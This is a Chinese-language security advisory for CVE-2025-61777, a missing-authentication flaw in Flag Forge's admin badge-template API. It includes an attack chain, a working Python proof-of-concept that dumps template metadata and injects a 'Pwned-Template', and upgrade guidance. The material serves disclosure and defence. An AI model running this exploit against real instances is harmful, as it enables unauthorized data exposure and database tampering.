CVE-2025-61777 Flag Forge 认证缺失导致未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-61777

漏洞类型

认证缺失/未授权访问

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flag Forge (FlagForgeCTF)

漏洞概述

CVE-2025-61777是Flag Forge（一个Capture The Flag/CTF竞赛平台）中存在的一个严重安全漏洞。该漏洞存在于版本2.0.0至2.3.2之前的所有版本中，具体涉及管理后台的徽章模板管理API端点。漏洞的根本原因是`/api/admin/badge-templates`（GET方法）和`/api/admin/badge-templates/create`（POST方法）这两个端点在设计上缺少必要的身份认证和授权检查机制。

由于这些管理端点暴露在公网上且无需任何认证即可访问，攻击者可以直接向目标服务器发送HTTP请求，从而获取系统中所有的徽章模板数据，包括敏感的元数据信息（如创建者createdBy、创建时间createdAt、更新时间updatedAt等）。此外，攻击者还可以通过POST请求向数据库中创建任意徽章模板，实现数据库污染。

该漏洞的危害程度极高，CVSS评分达到9.4分（满分10分），属于严重级别。攻击者无需任何特权即可远程利用，无需用户交互，对系统的机密性和完整性造成高影响。虽然对可用性的影响为低（因为攻击主要针对数据而非服务中断），但综合来看，该漏洞可能导致严重的数据泄露、数据库污染以及徽章系统的滥用。Flag Forge项目维护者已在v2.3.2版本中修复了该问题，增加了完整的认证和授权检查机制。

技术细节

该漏洞的技术原理在于API端点的访问控制缺失（Broken Access Control）。在Flag Forge v2.0.0至v2.3.1版本中，`/api/admin/badge-templates`路由的GET方法和`/api/admin/badge-templates/create`路由的POST方法在中间件层面没有应用任何身份认证或角色授权检查。

从技术实现角度来看，正常的受保护管理端点应当包含以下安全机制：1）身份认证中间件（如JWT验证、Session检查）来确认请求者身份；2）授权检查中间件来验证用户是否具有管理员角色；3）输入验证和清理。然而这些端点直接暴露在公网路由中，任何能够访问该应用的网络用户都可以直接调用。

利用方式非常直接：

1. 信息泄露利用：攻击者通过发送GET请求至`/api/admin/badge-templates`，服务器将返回所有徽章模板的完整数据，包括模板内容、创建者标识（createdBy字段可能包含用户ID或用户名）、时间戳等敏感信息。

2. 数据篡改利用：攻击者通过发送POST请求至`/api/admin/badge-templates/create`，在请求体中构造任意徽章模板数据（如模板名称、描述、图片URL等），服务器将直接将其写入数据库，导致数据库污染或恶意内容注入。

3. 持久化攻击：被创建的恶意徽章模板将在平台中持续存在，可能被用于钓鱼、社会工程攻击或破坏平台的正常运营。

修复方案在v2.3.2中实现：对所有GET、POST、UPDATE、DELETE端点增加了认证要求，并实施授权检查确保仅管理员角色可以访问和修改徽章模板。

攻击链分析

STEP 1

步骤1：目标识别

攻击者通过网络侦察发现运行Flag Forge v2.0.0至v2.3.1的CTF平台实例，确认目标存在未认证的管理API端点。

STEP 2

步骤2：信息收集

攻击者向/api/admin/badge-templates发送未经认证的GET请求，获取所有徽章模板数据，包括创建者信息、创建时间、更新时间等敏感元数据。

STEP 3

步骤3：数据污染

攻击者向/api/admin/badge-templates/create发送未经认证的POST请求，在请求体中构造恶意徽章模板数据并提交，服务器将其写入数据库。

STEP 4

步骤4：持久化与滥用

恶意创建的徽章模板在平台中持续存在，可用于钓鱼、社会工程攻击、平台声誉破坏或作为进一步攻击的跳板。

STEP 5

步骤5：影响扩大

通过泄露的createdBy元数据，攻击者可能识别管理员账户信息，结合其他漏洞或凭证填充攻击扩大攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61777 - Flag Forge Unauthenticated Badge Template Access PoC
# Affected versions: Flag Forge 2.0.0 - 2.3.1
# Fixed in: Flag Forge 2.3.2

import requests
import json

TARGET_URL = "https://target-flagforge-instance.com"

# Step 1: Exploit GET endpoint to retrieve all badge templates (no auth required)
def exploit_get_badge_templates():
    """
    Exploits the missing authentication on GET /api/admin/badge-templates
    to retrieve all badge templates and sensitive metadata.
    """
    endpoint = f"{TARGET_URL}/api/admin/badge-templates"
    print(f"[*] Sending unauthenticated GET request to {endpoint}")
    
    response = requests.get(endpoint)
    
    if response.status_code == 200:
        print(f"[+] Success! Retrieved badge templates (Status: {response.status_code})")
        templates = response.json()
        print(f"[+] Found {len(templates)} badge templates")
        
        # Extract and display sensitive metadata
        for template in templates:
            print(f"\n--- Badge Template ---")
            print(f"  Name: {template.get('name', 'N/A')}")
            print(f"  Created By: {template.get('createdBy', 'N/A')}")  # Sensitive
            print(f"  Created At: {template.get('createdAt', 'N/A')}")  # Sensitive
            print(f"  Updated At: {template.get('updatedAt', 'N/A')}")  # Sensitive
        return templates
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
        return None


# Step 2: Exploit POST endpoint to create arbitrary badge templates
def exploit_create_badge_template():
    """
    Exploits the missing authentication on POST /api/admin/badge-templates/create
    to inject arbitrary badge templates into the database.
    """
    endpoint = f"{TARGET_URL}/api/admin/badge-templates/create"
    print(f"\n[*] Sending unauthenticated POST request to {endpoint}")
    
    # Malicious badge template payload
    payload = {
        "name": "Pwned-Template",
        "description": "Injected by CVE-2025-61777 exploit",
        "imageUrl": "https://malicious-site.com/payload.png",
        "criteria": {"type": "manual"}
    }
    
    headers = {"Content-Type": "application/json"}
    response = requests.post(endpoint, json=payload, headers=headers)
    
    if response.status_code in [200, 201]:
        print(f"[+] Success! Badge template created (Status: {response.status_code})")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-61777 - Flag Forge Unauth Badge Template Access")
    print("=" * 60)
    
    # Execute exploit chain
    templates = exploit_get_badge_templates()
    exploit_create_badge_template()
    
    print("\n[*] Exploit complete.")

影响范围

Flag Forge >= 2.0.0

Flag Forge < 2.3.2

防御指南

临时缓解措施

目前没有可靠的临时缓解措施可用。建议立即升级到Flag Forge v2.3.2或更高版本以修复该漏洞。在无法立即升级的情况下，可以考虑在网络层面（如反向代理或WAF）临时限制对/api/admin/badge-templates相关端点的访问，仅允许受信任的内部网络IP访问，但这不能完全替代官方的安全修复。